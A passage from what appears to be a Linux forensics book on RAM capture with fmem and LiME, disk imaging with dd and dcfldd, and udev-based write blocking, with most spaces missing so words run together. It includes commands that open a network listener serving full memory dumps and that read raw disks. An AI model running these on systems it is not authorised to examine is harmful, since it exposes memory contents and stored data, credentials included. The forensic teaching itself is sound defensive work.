Onceagainweareusingfind inthisscript.Anewoption,-xdev,hasappeared.Thisoption tells find not to follow symbolic links to other filesystems. The commandsha1sum-b{filename}willcomputetheSHA1hashforfilenamewhiletreatingitasabinaryfile.

Partialresultsfromrunningthisscriptagainstthe/bindirectoryonthesubjectmachineareshowninFigure3.8.Thehighlightedlinesshowthat/bin/bashand/bin/falsehavethesame hash value. It would appear that the attacker overwrote /bin/false with /bin/bash.This is likely how system accounts such as lightdm were able to login despite theadministrator’sattemptstodisableloginbysettingtheshellequalto/bin/false.

FIGURE3.8

Some results from running send-sha1sum.sh against the /bin directory of the subject system. The files/bin/bash and /bin/false have the same hash value which indicates the attacker overwrote /bin/false with/bin/bash.

DUMPINGRAMWhatistheperfectwaytocapturearunningsystem?GetacopyofwhatisinRAM.Thisallowsyoutoexactlyrecreatethestateofamachine.Okay,notexactly,butcloseenoughfor our investigative purposes. Some recently released tools such a Volatility makeacquiringRAM images particularly useful.Getting these images today isn’t necessarilyeasy,however.

Manyyears agowhen computers had a gigabyte or less ofRAM itwasvery easy toacquireamemoryimageinLinux.PartofthereasonforthisisthattheLinux“everythingis a file” philosophy also applied toRAM.Thedevice /dev/mem represented all of thephysicalRAM.Thisdevicestillexists today,but it isonlycapableofaccessingthefirst896MBofphysicalRAM.

Virtualmemory(physicalRAMplusmemoryswappedtodisk)wasaccessibleviathe/dev/kmemdevice.Itdidn’ttakeverylongfortheworldwideLinuxcommunitytofigureout that having a userland (non-kernel or privilegedmode) device that could access allmemory was a huge security hole. Today /dev/kmem has been removed. Alternativemeansofcapturingmemoryimagesarenowrequired.

RAMacquisitionmethodsThere are hardware devices for capturingmemory.Memory dumping agents also exist.These agents are part of enterprise security solutions.These twomethods for acquiring

memory images are somewhat expensive and suffer from the fact that theymust be inplacebeforeabreach.Neitherofthesearewidelyused.

Other than the two choices above, if you want to capturememory you will need tocreatesomesortofdevicewhichcanaccessallof thevirtualmemory. Incidentally, thisassumesyoursubjectsystemisnotrunninginsideavirtualmachine.Ifthisisthecaseforyour investigation, consult your virtualization software documentation for instructions.Techniquespresentedherewillworkonbothphysicalandvirtualsystems.

A forensics memory device, fmem, is available for download fromhttp://hysteria.sk/~niekt0/foriana/fmem_current.tgz.Becausethefmemdevice(alongwiththeLiMEdevicetobediscussednext)ishighlydependentonvariouskernelstructures,itmust be built from source using header files from the subjectmachine. Remembermyearlierwarningsconcerningbuildinganythingonthesubjectsystem.

Oncebuiltandinstalledthenewlycreateddevice/dev/fmemworksjustlike/dev/mem,butwithout the limitationsofonlyaccessing the first896MBofRAM.The /dev/fmemdevicecanbeusedtodumpthephysicalRAMand/proc/iomemusedtodeterminewheretofindtheinterestingportions.Usingfmemyouwillendupwitharawmemoryimage.Ascreenshot from the terminalwindow I used to build and install fmemonmy forensicsworkstation is shown in Figure 3.9. Notice that fmem is simple enough that the entirebuildandinstallprocessfitsonasinglescreenincludingtheprintoutofthememoryareasafterinstallation.

FIGURE3.9

Buildingandinstallingfmem.

Issuingthecommandcat/proc/iomemwillprintalonglistofinformation,mostofwhichisuninterestingtotheforensicinvestigator.Ifweusegrep(theGNURegular

ExpressionParser) toextractonly the“SystemRAM”entries from the resultsusing thecommandcat/proc/iomem|grep“SystemRAM”,wewillseewhichrelevantblocks of memory should be captured. The tail of the unfiltered output from cat/proc/iomemand theresultsofpiping this togrep“SystemRAM”areshowninFigure3.10.

FIGURE3.10

Results fromcatting the /proc/iomempseudo file.Unfiltered resultsareshownat the topand theblocksofsystemRAMareshownatthebottom.

Thedd utility can be used to dump the relevant RAM sections to a file. This rawcapture is difficult to use for anything beyond simple searches. The dd program andrelatedutilitieswillbe fullydescribed in thenextchapter (Chapter4:CreatingImages).Thankfully,thereisamucheasierandusefulwaytocollectmemoryimagesthatwewilldiscussnext.

BuildingLiMEThe Linux Memory Extractor (LiME) is the tool of choice for extracting memory onLinux systems for a couple of reasons. First, it is very easy to use. Second, andmoreimportantly, itstoresthecaptureinaformatthat iseasilyreadbytheVolatilitymemoryanalysisframework.

Aswith fmem,LiMEmust be built from source.LiME should be built for the exactkernel version of the subject system, but never on the subject system. If your forensicsworkstation just happens to be the identical version ofUbuntu used by the subject, thecommandsudoapt-getinstalllime-forensics-dkmswilldownloadandbuildLiMEforyou.

For every other situation you must download LiME fromhttps://github.com/504ensicsLabs/LiME using the command git clonehttps://github.com/504ensicsLabs/LiME and compile it with the correctkernelheaders.Ifyourworkstationandthesubjecthavetheexactsamekernel,LiMEisbuiltbysimplychangingtothedirectorywhereLiMEresidesandrunningmakewithnoparameters.ThecompletesetofcommandstodownloadandbuildLiMEforthecurrentkernelareshowninFigure3.11.Noticethateverythingfitsonasinglescreenevenwithmy fat-fingering a few commands (runningmake before changing to the src directory,etc.). Also notice the last line moves (renames) the lime.ko file to lime-<kernelversion>.ko.

FIGURE3.11

DownloadingandbuildingLiMEforthecurrentkernel.Notethatthemodulefileisautomaticallyrenamedtolime-<kernelversion>.kowhenusingthismethod.

Ifthekernelversionsdiffer,thecorrectcommandtobuildLiMEforthesubjectismake-C/lib/modules/<kernelversion>/buildM=$PWD.Note thatwhen youbuildaLiMEmodulethiswaytheoutputfile isnotrenamedwithasuffixfor theexactkernelversion.Istronglyrecommendyoudothisyourselfasitdoesn’ttakelongforyouto end up with a collection of LiME kernel modules on your response drive. ThecommandstobuildandrenameaLiMEmodulethatisnotbuiltforthecurrentkernelareshowninFigure3.12.

FIGURE3.12

Building LiME for other than the current kernel. It is recommended that the lime.ko file be renamed tosomethingmoredescriptiveafteritiscreated.

UsingLiMEtodumpRAMAssumingthatyouhavebuiltLiMEforthecurrentkernelversioninusebyyoursubjectsystemyouarenowreadytouseit.BeforeusingLiMEyoumustmaketwochoices.Thefirst choice is the format for output and the second is a destination for the dump file,whichLiMEcallsapath.

Therearethreeformatchoices:raw,padded,andLiME.Rawformatiseverymemorysegmentconcatenatedtogether.Whenusingtherawformat,areasofmemorycontainingblocksofzerosareskipped.Paddedissimilartoraw,butthezerosareretainedsoyoucanknowthelocationofmemorychunks,notjusttheircontents.

Not surprisingly, the LiME format is the recommended format. This format capturesmemory and stores it in structures complete with metadata. This is the formatrecommended by the authors of the Volatility memory analysis framework. I alsorecommendthisformatasitcontainsthemostinformationforyourlateranalysis.

LiMEsupports twodifferent paths: a file or a networkport. If youhave connected alargecapacityUSBdrivetothesubjectcomputeritisacceptabletostoreyourRAMdumpdirectlytothisfile.Undernocircumstancesshouldthisfilebesavedtothesubject’sharddrive! The network port path is my preferred method for extracting memory images.Whenusingthistechniquealistenerissetuponthesubjectsystem,andnetcatisusedontheforensicsworkstationtoreceivethememorydump.

Thegeneralformatforrunninglimeissudoinsmodlime.ko“path=<path>

format=<format>”.Thiscommandinstalls(orinserts)akernelmodule.Forobviousreasons thiscommand requires rootprivileges.Notice that Ihaveputquotesaround theparameters forLiME.This iswhatyouneed todowithmost versionsofLinux. If thisdoesn’tworkforyoutryremovingthequotes.

TodumptheRAMcopythecorrectLiMEmoduletoyourresponsedriveorothermedia(neverthesubject’sharddisk!).Onthesubjectmachineexecutesudoinsmodlime-<kernelversion>.ko“path=tcp:<portnumber>format=lime”tosetupalistenerthatwilldumpRAMtoanyonethatconnects.NotethatLiMEsupportsotherprotocols suchasUDP,but I recommendyou stickwithTCP. It isn’t abad idea to rununame-abeforeinstallingLiMEtodoublecheckthatyouareusingthecorrectkernelversion.The commands for installingLiMEon the subject system are shown inFigure3.13.

FIGURE3.13

InstallingLiMEonthesubjectsystem.Notethatuname-ahasbeenrunbeforeinstallingLiMEtoremindtheinvestigatorwhichversionofLiMEshouldbeused.

On the forensics workstation running nc {subject IP} {port used byLiME}>{filename}, i.e.nc 192.168.56.101 8888 > ram.lime, willconnecttotheLiMElistenerandsendaRAMdumpoverthenetwork.Oncethedumphasbeen sent LiME uninstalls the module from the subject system. The beginning of thereceived RAM dump is shown in Figure 3.14. Note that the file header is “EMiL” orLiMEspelledbackwards.

FIGURE3.14

TheRAMdumpfileinLiMEformat.Notethattheheaderis“EMiL”orLiMEspelledbackwards.

SUMMARYIn this chapter we have discussed multiple techniques that can be used to gatherinformationfromasystemwithouttakingitoffline.Thisincludedcollectinganimageofsystemmemoryforlaterofflineanalysis.Analyzingthisimagewillbebediscussedlaterinthisbook(Chapter8:MemoryAnalysis).Inthenextchapterwewillturnourattentiontotraditionaldeadanalysiswhichrequiresustoshutdownthesubjectsystem.

CHAPTER

4CreatingImagesINFORMATIONINTHISCHAPTER:

ShuttingdownthesystemImageformatsUsingddUsingdcflddHardwarewriteblockingSoftwarewriteblockingUdevrulesLiveLinuxdistributionsCreatinganimagefromavirtualmachineCreatinganimagefromaphysicaldrive

SHUTTINGDOWNTHESYSTEMWearefinallyreadytostartthetraditionaldeadanalysisprocess.WehavenowprogressedtothenextblockinourhighlevelprocessasshowninFigure4.1.Ifsometimehaspassedsince you performed your initial scans and live analysis captures described in theproceedingchapters,youmaywishtoconsiderrerunningsomeorallofthescripts.

FIGURE4.1

Highlevelforensicincidentresponseprocess.

Asyouprepare toshutdownthesystemfor imagingyouarefacedwithadecisiontoperformanormalshutdownortopulltheplug.Aswithmanythingsinforensics,thereisnotonerightanswertothisquestionforeverysituation.Theinvestigatormustweightheplusesandminusesforeachoption.

NormalshutdownAnormalshutdownshould,intheory,leaveyouwithacleanfilesystem.This,ofcourse,assumesthatthisispossiblewithasysteminfectedwithmalware.Ihavefoundthatsomerootkitspreventanormalshutdown.Thebiggestreasonnottouseanormalshutdownisthat somemalwaremight clean up after itself, destroy evidence, or evenworse destroyother information on the system. With the modern journaling filesystems likely to befoundonthesubjectsystem,acleanfilesystemisnotascrucialasitwasmanyyearsago.

PullingtheplugIf we simply cut power to the subject system the filesystem(s) may not be clean. Aspreviously mentioned, this is not necessarily as serious as it was before journalingfilesystems became commonplace. One thing you can do to minimize the chances ofdealing with a filesystem that is extremely dirty (lots of file operations waiting in thecache)istorunthesynccommandbeforepullingtheplug.Thereisalwaysachancethatanattackerhasalteredthesyncprogram,butintherareinstanceswheretheyhavedonesoyourliveanalysiswouldlikelyhaverevealedthis.

Thebestthingthismethodhasgoingforitisthatmalwaredoesn’thaveanychancetoreact.Giventheinformationcollectedbyrunningyourscriptsduringtheliveanalysisandmemoryimageyouhavedumped,youarenotlikelytolosemuchifanyinformationbypullingtheplug.Ifyoususpectamalwareinfectionthisisyourbestoptioninmostcases.

IMAGEFORMATSAswiththememoryimages,therearechoicesofformatsforstoringfilesystemimages.Atabasiclevelyoumustdecidebetweenarawformatandaproprietaryformat.Withinthesechoicestherearestillsubchoicestobemade.

RawformatTherawformatisnothingmorethanasetofbytesstoredinthesamelogicalorderastheyare found on disk. Nearly every media you are likely to encounter utilizes 512 bytesectors.WhereasolderdevicesformattedwithWindowsfilesystems(primarilyFAT12andFAT16)mayusecylinders,heads,andsectorstoaddressthesesectors,theLinuxforensicsinvestigator is much more fortunate in that media he or she encounters will almostcertainlyuseLogicalBlockAddressing(LBA).

OnmediawhereLBAisusedsectorsarenumberedlogicallyfrom0to({mediasizeinbytes} / 512 -1). The sectors are labeled LBA0, LBA1, etc. It is important tounderstanding that this logicaladdressing isdone transparentlyby themediadeviceandthereforedeterministic (doesn’tdependonwhichoperating system reads the filesystem,

etc.).A raw image is nothingmore than a large filewith LBA0 in the first 512 bytes,followedbyLBA1inthenext512bytes,andsoon.

Becausetherawformatisessentiallyidenticaltowhatisstoredonthemedia,therearenumerousstandardtoolsthatcanbeusedtomanipulatethem.Forthisandotherreasonstherawformatisverypopularandsupportedbyeveryforensicstool.Becauserawimagesarethesamesizeasthemediatheyrepresent,theytendtobequitelarge.

Some investigators like to compress raw images. Indeed, some forensics tools canoperateoncompressedrawimages.Onethingtokeepinmindshouldyouchoosetoworkwithcompressedimagesisthatitlimitsyourtoolselection.Itwillalsolikelyresultinaperformancepenaltyformanycommonforensicstaskssuchassearching.

ProprietaryformatwithembeddedmetadataEnCase is a widely used proprietary forensics tool. It is especially popular amongexaminers thatfocusonWindowssystems.TheEnCasefileformatconsistsofaheader,therawsectorswithchecksumsevery32kilobytes(64standardsectors),andafooter.Theheader contains metadata such as the examiner, acquisition date, etc. and ends with achecksum.ThefooterhasanMD5checksumforthemediaimage.

TheEnCasefileformatsupportscompression.Compression isdoneat theblock levelwhichmakessearchingalittlefasterthanitwouldbeotherwise.Thereasonforthisisthatmostsearchesareperformedforcertaintypesoffilesandfileheadersatthebeginningofblocks(sectors)areusedtodeterminefiletype.

ProprietaryformatwithmetadatainaseparatefileHalfwaybetweentherawformatandsomesortofproprietaryformatistheuseofmultiplefilestostoreanimage.Typicallyonefileisarawimageandtheotherstoresmetadatainaproprietaryway.Anumberofimagingtoolsmakethischoice.

RawformatwithhashesstoredinaseparatefileInmyopinion,thebestoptionistoacquireimagesintherawformatwithhashesstoredseparately.Thisallows the image tobeusedwitheveryforensicspackageavailableandaddsstandardLinuxsystemtoolstoyourtoolbox.Thehashesallowyoutoprovethatyouhavemaintainedtheintegrityoftheimageduringtheinvestigation.

In a perfectworld youwould create an image of a disk and calculate a hash for theentireimageandthatwouldbetheendofit.Wedon’tliveinaperfectworld,however.Asa result, I recommend that you hash chunks of the image in addition to calculating anoverallhash.

There are a couple of reasons for this recommendation. First, it is a good idea toperiodicallyrecalculatethehashesasyouworktoverifyyouhavenotchangedanimage.If the image is large, computing the overall hash might be time consuming whencomparedtohashingasmallchunk.Second,youmayencountermediathatisdamaged.Certain areasmaynot read the same every time. It ismuchbetter to discard data from

these damaged areas than to throw out an entire disk image if the hash doesn’tmatch.Fortunatelysomeofthetoolstobediscussedinthischapterdothishashingforyou.

USINGDDAll Linux systems ship with a bit-moving program known as dd. This utility predatesLinuxbyseveralyears.ItsoriginalusewasforconvertingtoandfromASCII(AmericanSymbolic Code for Information Interchange) and EBCDIC (Extended Binary CodedDecimal Interchange Code). For those unfamiliar with EBCDIC, it was an encodingprimarilyusedbyIBMmainframes.

Inadditiontoitsconversioncapabilities,ddisusedforpushingdatafromoneplacetoanother.Dataiscopiedinblocks,withadefaultblocksizeof512bytes.Themostbasicuseofddisddif=<inputfile>of=<outputfile>bs=<blocksize>.InLinux,whereeverything isa file, if the input file representsadevice, theoutput filewillbearawimage.

Forexample,ddif=/dev/sdaof=sda.imgbs=512willcreatearawimageofthefirstdriveonasystem.Ishouldpointoutthatyoucanalsoimagepartitionsseparatelybyusingadevicefilethatcorrespondstoasinglepartitionsuchas/dev/sda1,/dev/sdb2,etc.Irecommendthatyouimagetheentirediskasaunit,however,unlessthereissomereason(suchaslackofspacetostoretheimage)thatpreventsthis.

Thereare a few reasonswhy I recommend imaging theentiredrive if at all possible.First, it becomes much simpler to mount multiple partitions all at once using scriptspresented later in this book. Second, any string searches can be performed againsteverythingyouhavecollected,includingswapspace.Finally,therecouldbedatahiddeninunallocatedspace(notpartofanypartition).

Doesblocksizematter?Intheoryitdoesn’tmatterasddwillfaithfullycopyanypartialblocksso that the inputandoutput filesare thesamesize(assumingnoconversionsareperformed).Thedefaultblocksizeis512bytes.Optimumperformanceisachievedwhentheblocksizeisanevenmultipleofthebytesreadatatimefromtheinputfile.

Asmostdeviceshave512byteblocks,anymultipleof512willimproveperformanceattheexpenseofusingmorememory.Inthetypicalscenario(describedlaterinthischapter)wherean image isbeingcreatedfrommediaremovedfromthesubjectsystem,memoryfootprint isnot a concernandablock sizeof4kilobytesormore is safelyused.Blocksizesmaybedirectlyenteredinbytesorasmultiplesof512bytes,kilobytes(1024bytes),megabytes(1024*1024bytes)usingthesymbolsb,k,andM,respectively.Forexample,a4kilobyteblocksizecanbewrittenas4096,8b,or4k.

There is one last thing I should mention before moving on to another tool. Whathappenswhenthereisanerror?Thedefaultbehaviorisforddtofail.Thiscanbechangedbyadding theoptionconv=noerror,sync to thedd command.Whena readerroroccurs,any bad bytes will be replaced with zeros in order to synchronize the position ofeverythingbetweentheinputandoutputfiles.

USINGDCFLDDThe United States Department of Defense Computer Forensics Lab developed anenhancedversionofddknownasdcfldd.This tool adds several forensics features todd.Oneof themost important features is theability tocalculatehasheson the fly.Thecalculatedhashesmaybesenttoafile,displayedinaterminal(default),orboth.

Inadditiontocalculatinganoverallhash,dcflddcancomputehashesforchunksofdata (which it callswindows).Asof thiswriting,dcfldd supports the followinghashalgorithms:MD5,SHA1,SHA256,SHA384,andSHA512.Multiplehashalgorithmsmaybeusedsimultaneouslywithhasheswrittentoseparatefiles.

Thegeneralformatforusingdcflddtocreateanimagewithhashesinaseparatefileisdcflddif=<subjectdevice>of=<imagefile>bs=<blocksize>hash=<algorithm>hashwindow=<chunksize>hashlog=<hashfile>conv=noerror,sync.Forexample,tocreateanimageofthesecondharddriveonasystem with SHA256 hashes calculated every 1GB the correct command would bedcfldd if=/dev/sdb of=sdb.img bs=8k hash=sha256hashwindow=1G hashlog =sdb.hashes conv=noerror,sync. If youwantedtocalculatebothSHA256andMD5hashesforsomereasonthecommandwouldbe dcfldd if=/dev/sdb of=sdb.img bs=8k hash=sha256,md5hashwindow=1G sha256log=sdb.sha256hashesmd5log=sdb.md5hashesconv=noerror,sync.

HARDWAREWRITEBLOCKINGYoushouldhavesomemeansofassuringthatyouarenotalteringthesubject’sharddrivesand/or other media when creating images. The traditional way to do this is to use ahardwarewriteblocker.Inmanycaseshardwarewriteblockersareprotocol(SATA,IDE,SCSI,etc.)specific.

Hardwarewriteblockerstendtobealittlepricey.AcheapermodelmightcostupwardsofUS$350.Becausetheyareexpensive,youmightnotbeabletoaffordasetofblockersfor all possible protocols. If you can only afford one blocker I recommend you buy aSATA unit as that is by far what the majority of systems will be using. A relativelyinexpensive blocker is shown in Figure 4.2. If you find yourself doing a lot of LinuxresponseindatacentersaSCSIunitmightbeagoodchoiceforasecondblocker.

FIGURE4.2

ATableauSATAwriteblocker.

Thereareafewcheaperopen-sourceoptionsavailable,buttheytendtohavelimitations.One such option is a microcontroller-based USBwrite blocker which I developed anddescribed in a course on USB forensics at PentesterAcademy.com(http://www.pentesteracademy.com/course?id=16). I do not recommend the use of this

deviceforlargemedia,however,asitislimitedtoUSB2.0fullspeed(12Mbps).Imayportthiscodetoanewmicrocontrollerthatiscapableofhigherspeeds(atleast480Mbps)atsomepoint,butforthemomentIrecommendtheUdevrulesmethoddescribedlaterinthischapter.

SOFTWAREWRITEBLOCKINGJustashardwareroutersarereallyjustprettyboxesrunningsoftwarerouters(usuallyonLinux),hardwarewriteblockersarealmostalwayssmallcomputerdevicesrunningwriteblockingsoftware.ThereareseveralcommercialoptionsforWindowssystems.Naturally,mostoftheLinuxchoicesarefreeandopensource.

Thereisakernelpatchavailabletomountblockdevicesautomatically.Youcanalsosetsomething up in your favorite scripting language.Next Iwill describe a simpleway toblockanythingconnectedviaUSBusingudevrules.

UdevrulesUdevrulesarethenewwaytocontrolhowdevicesarehandledonLinuxsystems.Usingthe udev rules presented below, a “magic USB hub” can be created that automaticallymountsanyblockdeviceconnecteddownstreamfromthehubasread-only.

Linux systems shipwith a set of standard udev rules.Administratorsmay customizetheir systems by adding their own rules to the /etc/udev/rules.d directory. Like manysystem scripts (i.e. startup scripts), the order in which these rules are executed isdeterminedbythefilename.Standardpracticeistostartthefilenamewithanumberwhichdetermineswhenitisloaded.

Whentherulesintherulesfilebelowarerun,alloftheinformationrequiredtomountafilesystemisnotyetavailable.Forthisreason,therulesgeneratescriptswhichcallotherscriptsintwostages.Thefileshouldbenamed/etc/udev/rules.d/10-protectedmount.rules.Notethatthevendorandproductidentifierswillbesetwithaninstallscripttomatchyourhub.Thisinstallscriptispresentedlaterinthischapter.ACTION==”add”,SUBSYSTEM==”block”,KERNEL==”sd?[1-9]”,ATTRS{idVendor}==”1a40”,ATTRS{idProduct}==”0101”,ENV{PHIL_MOUNT}=”1”,ENV{PHIL_DEV}=”%k”,RUN+=”/etc/udev/scripts/protmount.sh%k%n”

ACTION==”remove”,SUBSYSTEM==”block”,KERNEL==”sd?[1-9]”,ATTRS{idVendor}==”1a40”,ATTRS{idProduct}==”0101”,ENV{PHIL_UNMOUNT}=”1”,RUN+=”/etc/udev/scripts/protmount3.sh%k%n”

ENV{PHIL_MOUNT}==”1”,ENV{UDISKS_PRESENTATION_HIDE}=”1”,ENV{UDISKS_AUTOMOUNT_HINT}=”never”,RUN+=”/etc/udev/scripts/protmount2-%n.sh”

ENV{PHIL_MOUNT}!=”1”,ENV{UDISKS_PRESENTATION_HIDE}=”0”,ENV{UDISKS_AUTOMOUNT_HINT}=”always”

ENV{PHIL_UNMOUNT}==”1”,RUN+=”/etc/udev/scripts/protmount4-%n.sh”

Thegeneralformatfor theserulesisaseriesofstatementsseparatedbycommas.Thefirststatements,thosewithdoubleequals(“==”),arematchingstatements.Ifalloftheseare matched, the remaining statements are run. These statements primarily set

environmentvariablesandaddscriptstoalistofthosetoberun.Anysuchscriptsshouldrunquicklyinordertoavoidboggingdownthesystem.

The first rule canbe broken intomatching statements and statements to be executed.The matching statements are ACTION==”add”, SUBSYSTEM==”block”,KERNEL==”sd?[1-9]”, ATTRS{idVendor}==”1a40”,ATTRS{idProduct}==”0101”. This matches when a new device is added; it is ablockdevice;itisnamed/dev/sdXn(whereXisaletterandnisapartitionnumber),anditsoraparents’USBvendorandproduct IDmatch thosespecified. Ifyouonlywant tomatch the current device’s attribute and not the parent’s, use ATTR{attributeName}instead of ATTRS{attributeName}. By using ATTRS we are assured the rule will bematchedbyeverydeviceattacheddownstreamfromthehub.

Thepartof thefirstrulecontainingcommandstorunisENV{PHIL_MOUNT}=”1”,ENV{PHIL_DEV}=”%k”, RUN+=”/etc/udev/scripts/protmount.sh %k%n” . These statements set an environment variable PHIL_MOUNT equal to 1, setanotherenvironmentvariablePHIL_DEVtothekernelnamefor thedevice(sda3,sdb1,etc.), andappends /etc/udev/scripts/protmount.sh to the listof scripts tobe runwith thekernelnameforthedeviceandpartitionnumberpassedinasparameters.

Thesecondruleisverysimilartothefirst,butitmatcheswhenthedeviceisremoved.Itsets an environment variable PHIL_UNMOUNT to 1 and adds/etc/udev/scripts/protmount3.shtothelistofscriptstoberun(thekerneldevicenameandpartition number are again passed in as parameters). The protmount3.sh andprotmount4.shscriptsareusedtocleanupafterthedeviceisremoved.

The next rule ENV{PHIL_MOUNT}==”1”,ENV{UDISKS_PRESENTATION_HIDE}=”1”,ENV{UDISKS_AUTOMOUNT_HINT}=”never”,RUN+=”/etc/udev/scripts/protmount2.sh” is run later just before theoperating system attempts to mount the filesystem. If the PHIL_MOUNT variable hasbeenset,we tell theoperatingsystem tohide thenormaldialog that isdisplayed,neverautomount the filesystem (because it wouldn’t be mounted read-only), and add theprotmount2.shscript tothelistof thingstobeexecuted.IfPHIL_MOUNThasnotbeensetto1,wesetuptheoperatingsystemtohandlethedevicethestandardway.Thelastrulecausesprotmount4.shtorunifthePHIL_UNMOUNTvariablehasbeenset.

We will now turn our attention to the scripts. Two of the scripts protmount.sh andprotmount3.sh are used to create the other two protmount2.sh and protmount4.sh,respectively.As previouslymentioned, the reason for this is that all of the informationneeded toproperlymountandunmount thefilesystemisnotavailableat thesame time.Theprotmount.shscriptfollows.#!/bin/bash

echo“#!/bin/bash”>“/etc/udev/scripts/protmount2-$2.sh”

echo“mkdir/media/$1”>>“/etc/udev/scripts/protmount2-$2.sh”

echo“chmod777/media/$1”>>“/etc/udev/scripts/protmount2-$2.sh”

echo“/bin/mount/dev/$1-oro,noatime/media/$1”>>“/etc/udev/scripts/protmount2-$2.sh”

chmod+x“/etc/udev/scripts/protmount2-$2.sh”

This script echoesa seriesof commands to thenewscript.The first line includes thefamiliarshe-bang.Thesecondlinecreatesadirectory, /media/{kerneldevicename}(i.e./media/sdb2). The third line opens up the permissions on the directory. The fourth linemounts the filesystem as read-only with no access time updating in the newly createddirectory.Thefinallineinthescriptmakestheprotmount2.shscriptexecutable.

Theprotmount3.shscriptissimilarexceptthatitcreatesacleanupscript.Thecleanupscriptisprotmount4.sh.Theprotmount3.shscriptfollows.#!/bin/bash

echo“#!/bin/bash”>“/etc/udev/scripts/protmount4-$2.sh”

echo“/bin/umount/dev/$1”>>“/etc/udev/scripts/protmount4-$2.sh”

echo“rmdir/media/$1”>>“/etc/udev/scripts/protmount4-$2.sh”

chmod+x“/etc/udev/scripts/protmount4-$2.sh”

An installation script has been created for installing this system. This script takes avendorandproductIDasrequiredparameters.ItalsotakesanoptionalsecondproductID.Youmight be curious as to why this is in the script. If you are using a USB 3.0 hub(recommended) it actuallypresents itself as twodevices,one is aUSB2.0huband theother is aUSB3.0hub.These twodeviceswillhavea commonvendor ID,butuniqueproductIDs.#!/bin/bash

#

#Installscriptfor4deckaddonto“TheDeck”

#ThisscriptwillinstalludevruleswhichwillturnaUSBhub

#intoamagichub.Everyblockdeviceconnectedtothemagichub

#willbeautomaticallymountedunderthe/mediadirectoryasreadonly.

#Whilethiswasdesignedtoworkwith“TheDeck”itwillmostlikely

#workwithmostmodernLinuxdistros.Thissoftwareisprovidedasis

#withoutwarrantyofanykind,expressorimplied.Useatyourown

#risk.Theauthorisnotresponsibleforanythingthathappensas

#aresultofusingthissoftware.

#

#InitialversioncreatedAugust2012byDr.PhilPolstra,Sr.

#Version1.1createdMarch2015

#newversionsaddssupportforasecondPIDwhichisrequired

#whenusingUSB3.0hubsastheyactuallypresentastwohubs

unsetVID

unsetPID

unsetPID2

functionusage{

echo“usage:sudo$(basename$0)—vid05e3—pid0608[—pid20610]”

cat<<EOF

Bugsemail:“DrPhilatpolstra.org”

RequiredParameters:

—vid<VendorIDofUSBhub>

—pid<ProductIDofUSBhub>

OptionalParameters:

—pid2<SecondProductIDofUSB3.0hub>

EOF

exit

}

functioncreateRule{

cat>/etc/udev/rules.d/10-protectedmount.rules<<-__EOF__

ACTION==”add”,SUBSYSTEM==”block”,KERNEL==”sd?[1-9]”,ATTRS{idVendor}==”${VID}”,ATTRS{idProduct}==”${PID}”,ENV{PHIL_MOUNT}=”1”,ENV{PHIL_DEV}=”%k”,RUN+=”/etc/udev/scripts/protmount.sh%k%n”

ACTION==”remove”,SUBSYSTEM==”block”,KERNEL==”sd?[1-9]”,ATTRS{idVendor}==”${VID}”,ATTRS{idProduct}==”${PID}”,ENV{PHIL_UNMOUNT}=”1”,RUN+=”/etc/udev/scripts/protmount3.sh%k%n”

ENV{PHIL_MOUNT}==”1”,ENV{UDISKS_PRESENTATION_HIDE}=”1”,ENV{UDISKS_AUTOMOUNT_HINT}=”never”,RUN+=”/etc/udev/scripts/protmount2-%n.sh”

ENV{PHIL_MOUNT}!=”1”,ENV{UDISKS_PRESENTATION_HIDE}=”0”,ENV{UDISKS_AUTOMOUNT_HINT}=”always”

ENV{PHIL_UNMOUNT}==”1”,RUN+=”/etc/udev/scripts/protmount4-%n.sh”

__EOF__

if[!“$PID2”=“”];then

cat>>/etc/udev/rules.d/10-protectedmount.rules<<-__EOF__

ACTION==”add”,SUBSYSTEM==”block”,KERNEL==”sd?[1-9]”,ATTRS{idVendor}==”${VID}”,ATTRS{idProduct}==”${PID2}”,ENV{PHIL_MOUNT}=”1”,ENV{PHIL_DEV}=”%k”,RUN+=”/etc/udev/scripts/protmount.sh%k%n”

ACTION==”remove”,SUBSYSTEM==”block”,KERNEL==”sd?[1-9]”,ATTRS{idVendor}==”${VID}”,ATTRS{idProduct}==”${PID2}”,ENV{PHIL_UNMOUNT}=”1”,RUN+=”/etc/udev/scripts/protmount3.sh%k%n”

ENV{PHIL_MOUNT}==”1”,ENV{UDISKS_PRESENTATION_HIDE}=”1”,ENV{UDISKS_AUTOMOUNT_HINT}=”never”,RUN+=”/etc/udev/scripts/protmount2-%n.sh”

ENV{PHIL_MOUNT}!=”1”,ENV{UDISKS_PRESENTATION_HIDE}=”0”,ENV{UDISKS_AUTOMOUNT_HINT}=”always”

ENV{PHIL_UNMOUNT}==”1”,RUN+=”/etc/udev/scripts/protmount4-%n.sh”

__EOF__

fi

}

functioncopyScripts{

if[!-d“/etc/udev/scripts”];then

mkdir/etc/udev/scripts

fi

cp./protmount*.sh/etc/udev/scripts/.

}

#parsecommandlineoptions

while[!-z“$1”];do

case$1in

-h|—help)

usage

;;

—vid)

VID=”$2”

;;

—pid)

PID=”$2”

;;

—pid2)

PID2=”$2”

;;

esac

shift#consumecommandlinearguments1atatime

done

#nowactuallydosomething

createRule

copyScripts

The script is straightforward. It begins with the usual she-bang, then a couple ofenvironmentvariablesareunset.Weseeatypicalusagefunction,thenafewfunctionsaredefined for creatingandcopying files.Finally, these functions are runat the endof thescript.

LiveLinuxdistributionsThepreferredmethodofcreatinganimageofaharddriveistoremoveitfromthesubjectsystem.This isnotalwayspractical,however.Forexample,somelaptops(includingtheone I am currently using towrite this book)must be disassembled to remove the harddrive as they lack access panels for this purpose. Booting a live Linux distribution inforensicsmodecanbetheeasiestoptionforthesetypesofsituations.

There are a couple of options available.Most any liveLinuxwillwork, but it neverhurtstouseaforensics-orienteddistributionlikeSIFT.YoucaneitherinstallittoitsownUSBdriveoruse thesameUSBdrive thatyouuse foryourknown-goodbinaries.As Isaid earlier in this book, if youdo this youwill need to format thedrivewithmultiplepartitions.ThefirstmustbeFATinorderforittoboot,andthepartitionwiththebinaries

mustbeformatedasext2,ext3,orext4topreservepermissions.

TherearesomethatliketousealiveLinuxdistributionontheforensicsworkstation.Irecommendagainstdoingthis.Myprimaryobjectiontodoingthisisthattheperformanceisalways relativelypoorwhenrunninga liveLinuxdistribution,aseverything is run inRAM. If you are just running the live Linux distribution for the write blocking, Irecommendyoujustusemyudevrules-basedblockingdescribedearlierinthischapter.

